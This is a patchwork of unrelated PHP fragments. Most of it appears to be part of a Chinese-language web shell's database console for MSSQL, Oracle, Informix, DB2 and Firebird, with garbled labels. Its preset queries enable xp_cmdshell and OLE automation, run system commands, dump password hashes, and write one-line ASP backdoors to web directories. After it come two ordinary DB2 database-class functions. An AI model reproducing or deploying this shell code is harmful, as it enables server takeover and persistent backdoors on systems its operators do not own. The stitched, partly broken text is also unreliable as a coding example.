style="width:100px"> User:<input type="text" name="msuser" value="{$msuser}" style="width:100px"> Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px"> Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br> <script language="javascript"> function msFull(i){ \tStr = new Array(11); \tStr[0] = ""; \tStr[1] = "select @@version;"; \tStr[2] = "select name from sysdatabases;"; \tStr[3] = "select name from sysobject where type='U';"; \tStr[4] = "select name from syscolumns where id=Object_Id('table_name');"; \tStr[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');"; \tStr[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');"; \tStr[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;"; \tStr[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;"; \tStr[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;"; \tStr[10] = "Exec master.dbo.xp_cmdshell 'net user';"; \tStr[11] = "Declare @s int;exec sp_oacreate '',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';"; \tStr[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' "; \tmsform.mssql.value = Str[i]; \treturn true; } </script> <textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br> <select onchange="return msFull(options[selectedIndex].value)"> \t<option value="0" selected>ִ������</option> \t<option value="1">��ʾ�汾</option> \t<option value="2">���ݿ�</option> \t<option value="3">����</option> \t<option value="4">�ֶ�</option> \t<option value="5">sp_oacreate</option> \t<option value="6">xp_cmdshell</option> \t<option value="7">xp_cmdshell(2005)</option> \t<option value="8">sp_oacreate(2005)</option> \t<option value="9">����openrowset(2005)</option> \t<option value="10">xp_cmdshell exec</option> \t<option value="10">sp_oamethod exec</option> \t<option value="11">sp_makewebtask</option> </select> <input type="hidden" name="action" value="msquery"> <input class="bt" type="submit" value="Query"></form></div> END; if ($msaction == 'msquery') { $msconn = mssql_connect($mshost, $msuser, $mspass); mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message()); $msresult = mssql_query($msquery) or die(mssql_get_last_message()); echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n"; for ($i = 0; $i < mssql_num_fields($msresult); $i++) { echo '<td><b>' . mssql_field_name($msresult, $i) . "</b></td>\n"; } echo "</tr>\n"; mssql_data_seek($result, 0); while ($msrow = mssql_fetch_row($msresult)) { echo "<tr>\n"; for ($i = 0; $i < mssql_num_fields($msresult); $i++) { echo '<td>' . "{$msrow[$i]}" . '</td>'; } echo "</tr>\n"; } echo "</table></font>"; mssql_free_result($msresult); mssql_close(); } } elseif ($db == "ora") { $orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost'; $oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521'; $orauser = isset($_POST['orauser']) ? $_POST['orauser'] : '******'; $orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '******'; $orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL'; $oraaction = isset($_POST['action']) ? $_POST['action'] : ''; $oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : ''; $oraquery = stripslashes($oraquery); print <<<END <form method="POST" name="oraform" action="?s=gg&db=ora"> <div class="actall"> Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px"> Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px"> User:<input type="text" name="orauser" value="{$orauser}" style="width:80px"> Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px"> SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br> <script language="javascript"> function oraFull(i){ Str = new Array(5); \tStr[0] = ""; \tStr[1] = "select version();"; \tStr[2] = "SELECT NAME FROM V{$DATABASE}"; \tStr[3] = "select * From all_objects where object_type='TABLE'"; \tStr[4] = "select column_name from user_tab_columns where table_name='table1'"; \toraform.orasql.value = Str[i]; \treturn true; } </script> <textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br> <select onchange="return oraFull(options[selectedIndex].value)"> \t<option value="0" selected>ִ������</option> \t<option value="1">��ʾ�汾</option> \t<option value="2">���ݿ�</option> \t<option value="3">����</option> \t<option value="4">�ֶ�</option> </select> <input type="hidden" name="action" value="myquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($oraaction == 'oraquery') { $oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror()); $oraresult = ociparse($oralink, $oraquery) or die(ocierror()); $orarow = oci_fetch_row($oraresult); echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n"; for ($i = 0; $i < oci_num_fields($oraresult); $i++) { echo '<td><b>' . oci_field_name($oraresult, $i) . "</b></td>\n"; } echo "</tr>\n"; ociresult($oraresult, 0); while ($orarow = ora_fetch_row($oraresult)) { echo "<tr>\n"; for ($i = 0; $i < ora_num_fields($result); $i++) { echo '<td>' . "{$orarow[$i]}" . '</td>'; } echo "</tr>\n"; } echo "</table></font>"; oci_free_statement($oraresult); ocilogoff(); } } elseif ($db == "ifx") { $ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : '******'; $ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '******'; $ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb'; $ifxaction = isset($_POST['action']) ? $_POST['action'] : ''; $ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : ''; $ifxquery = stripslashes($ifxquery); print <<<END <form method="POST" name="ifxform" action="?s=gg&db=ifx"> <div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px"> User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px"> Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br> <script language="javascript"> function ifxFull(i){ Str = new Array(11); \tStr[0] = ""; \tStr[1] = "select dbservername from sysobjects;"; \tStr[2] = "select name from sysdatabases;"; \tStr[3] = "select tabname from systables;"; \tStr[4] = "select colname from syscolumns where tabid=n;"; \tStr[5] = "select username,usertype,password from sysusers;"; \tifxform.ifxsql.value = Str[i]; \treturn true; } </script> <textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br> <select onchange="return ifxFull(options[selectedIndex].value)"> \t<option value="0" selected>ִ������</option> \t<option value="1">���ݿ�����������</option> \t<option value="1">���ݿ�</option> \t<option value="2">����</option> \t<option value="3">�ֶ�</option> \t<option value="4">hashes</option> </select> <input type="hidden" name="action" value="ifxquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($ifxaction == 'ifxquery') { $ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg()); $ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg()); $ifxrow = ifx_fetch_row($ifxresult); echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n"; for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) { echo '<td><b>' . ifx_fieldproperties($ifxresult) . "</b></td>\n"; } echo "</tr>\n"; mysql_data_seek($ifxresult, 0); while ($ifxrow = ifx_fetch_row($ifxresult)) { echo "<tr>\n"; for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) { echo '<td>' . "{$ifxrow[$i]}" . '</td>'; } echo "</tr>\n"; } echo "</table></font>"; ifx_free_result($ifxresult); ifx_close(); } } elseif ($db == "db2") { $db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost'; $db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000'; $db2user = isset($_POST['db2user']) ? $_POST['db2user'] : '******'; $db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '******'; $db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql'; $db2action = isset($_POST['action']) ? $_POST['action'] : ''; $db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : ''; $db2query = stripslashes($db2query); print <<<END <form method="POST" name="db2form" action="?s=gg&db=db2"> <div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px"> Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px"> User:<input type="text" name="db2user" value="{$db2user}" style="width:100px"> Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px"> Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br> <script language="javascript"> function db2Full(i){ Str = new Array(4); \tStr[0] = ""; \tStr[1] = "select schemaname from syscat.schemata;"; \tStr[2] = "select name from sysibm.systables;"; \tStr[3] = "select colname from syscat.columns where tabname='table_name';"; \tStr[4] = "db2 get db cfg for db_name;"; db2form.db2sql.value = Str[i]; return true; } </script> <textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br> <select onchange="return db2Full(options[selectedIndex].value)"> \t<option value="0" selected>ִ������</option> \t<option value="1">���ݿ�</option> \t<option value="1">����</option> \t<option value="2">�ֶ�</option> \t<option value="3">���ݿ�����</option> </select> <input type="hidden" name="action" value="db2query"> <input class="bt" type="submit" value="Query"></div></form> END; if ($myaction == 'db2query') { $db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg()); $db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg()); $db2row = db2_fetch_row($db2result); echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n"; for ($i = 0; $i < db2_num_fields($db2result); $i++) { echo '<td><b>' . db2_field_name($db2result) . "</b></td>\n"; } echo "</tr>\n"; while ($db2row = db2_fetch_row($db2result)) { echo "<tr>\n"; for ($i = 0; $i < db2_num_fields($db2result); $i++) { echo '<td>' . "{$db2row[$i]}" . '</td>'; } echo "</tr>\n"; } echo "</table></font>"; db2_free_result($db2result); db2_close(); } } elseif ($db == "fb") { $fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost'; $fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : ''; $fbpath = str_replace("\\\\", "\\", $fbpath); $fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : '******'; $fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : '******'; $fbaction = isset($_POST['action']) ? $_POST['action'] : ''; $fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : ''; $fbquery = stripslashes($fbquery); print <<<END <form method="POST" name="fbform" action="?s=gg&db=fb"> <div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px"> Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px"> User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px"> Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/> <script language="javascript"> function fbFull(i){ Str = new Array(5); \tStr[0] = ""; \tStr[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;"; \tStr[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';"; \tStr[3] = "input 'D:\\createtable.sql';"; \tStr[4] = "shell netstat -an;"; fbform.fbsql.value = Str[i]; return true; } </script> <textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br> <select onchange="return fbFull(options[selectedIndex].value)"> \t<option value="0" selected>ִ������</option> \t<option value="1">����</option> \t<option value="2">�ֶ�</option> \t<option value="3">����sql</option> \t<option value="4">shell</option> </select> <input type="hidden" name="action" value="fbquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($fbaction == 'fbquery') { $fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg()); $fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg()); echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n"; for ($i = 0; $i < ibase_num_fields($fbresult); $i++) { echo '<td><b>' . ibase_field_info($fbresult, $i) . "</b></td>\n"; } echo "</tr>\n"; ibase_field_info($fbresult, 0); while ($fbrow = ibase_fetch_row($fbresult)) { echo "<tr>\n"; for ($i = 0; $i < ibase_num_fields($fbresult); $i++) { echo '<td>' . "{$fbrow[$i]}" . '</td>'; } echo "</tr>\n"; } echo "</table></font>"; ibase_free_result($fbresult); ibase_close(); } } }
/** * Executes given SQL statement. We should use prepare / execute to allow the * database server to reuse its access plan and increase the efficiency * of your database access * * @param string $sql SQL statement * @return resource Result resource identifier * @access protected */ function _execute($sql) { // get result from db $result = db2_exec($this->connection, $sql); if (!is_bool($result)) { // build table/column map for this result $map = array(); $numFields = db2_num_fields($result); $index = 0; $j = 0; $offset = 0; while ($j < $numFields) { $columnName = strtolower(db2_field_name($result, $j)); $tmp = strpos($sql, '.' . $columnName, $offset); $tableName = substr($sql, $offset, $tmp - $offset); $tableName = substr($tableName, strrpos($tableName, ' ') + 1); $map[$index++] = array($tableName, $columnName); $j++; $offset = strpos($sql, ' ', $tmp); } $this->_resultMap[$result] = $map; } return $result; }
/** * INSERT wrapper, inserts an array into a table * * $args may be a single associative array, or an array of arrays * with numeric keys, for multi-row insert * * @param $table String: Name of the table to insert to. * @param $args Array: Items to insert into the table. * @param $fname String: Name of the function, for profiling * @param $options String or Array. Valid options: IGNORE * * @return bool Success of insert operation. IGNORE always returns true. */ public function insert($table, $args, $fname = 'DatabaseIbm_db2::insert', $options = array()) { if (!count($args)) { return true; } // get database-specific table name (not used) $table = $this->tableName($table); // format options as an array $options = IBM_DB2Helper::makeArray($options); // format args as an array of arrays if (!(isset($args[0]) && is_array($args[0]))) { $args = array($args); } // prevent insertion of NULL into primary key columns list($args, $primaryKeys) = $this->removeNullPrimaryKeys($table, $args); // if there's only one primary key // we'll be able to read its value after insertion $primaryKey = false; if (count($primaryKeys) == 1) { $primaryKey = $primaryKeys[0]; } // get column names $keys = array_keys($args[0]); $key_count = count($keys); // If IGNORE is set, we use savepoints to emulate mysql's behavior $ignore = in_array('IGNORE', $options) ? 'mw' : ''; // assume success $res = true; // If we are not in a transaction, we need to be for savepoint trickery if (!$this->mTrxLevel) { $this->begin(__METHOD__); } $sql = "INSERT INTO {$table} ( " . implode(',', $keys) . ' ) VALUES '; if ($key_count == 1) { $sql .= '( ? )'; } else { $sql .= '( ?' . str_repeat(',?', $key_count - 1) . ' )'; } $this->installPrint("Preparing the following SQL:"); $this->installPrint("{$sql}"); $this->installPrint(print_r($args, true)); $stmt = $this->prepare($sql); // start a transaction/enter transaction mode $this->begin(__METHOD__); if (!$ignore) { //$first = true; foreach ($args as $row) { //$this->installPrint( "Inserting " . print_r( $row, true )); // insert each row into the database $res = $res & $this->execute($stmt, $row); if (!$res) { $this->installPrint('Last error:'); $this->installPrint($this->lastError()); } // get the last inserted value into a generated column $this->calcInsertId($table, $primaryKey, $stmt); } } else { $olde = error_reporting(0); // For future use, we may want to track the number of actual inserts // Right now, insert (all writes) simply return true/false $numrowsinserted = 0; // always return true $res = true; foreach ($args as $row) { $overhead = "SAVEPOINT {$ignore} ON ROLLBACK RETAIN CURSORS"; db2_exec($this->mConn, $overhead, $this->mStmtOptions); $res2 = $this->execute($stmt, $row); if (!$res2) { $this->installPrint('Last error:'); $this->installPrint($this->lastError()); } // get the last inserted value into a generated column $this->calcInsertId($table, $primaryKey, $stmt); $errNum = $this->lastErrno(); if ($errNum) { db2_exec($this->mConn, "ROLLBACK TO SAVEPOINT {$ignore}", $this->mStmtOptions); } else { db2_exec($this->mConn, "RELEASE SAVEPOINT {$ignore}", $this->mStmtOptions); $numrowsinserted++; } } $olde = error_reporting($olde); // Set the affected row count for the whole operation $this->mAffectedRows = $numrowsinserted; } // commit either way $this->commit(__METHOD__); $this->freePrepared($stmt); return $res; }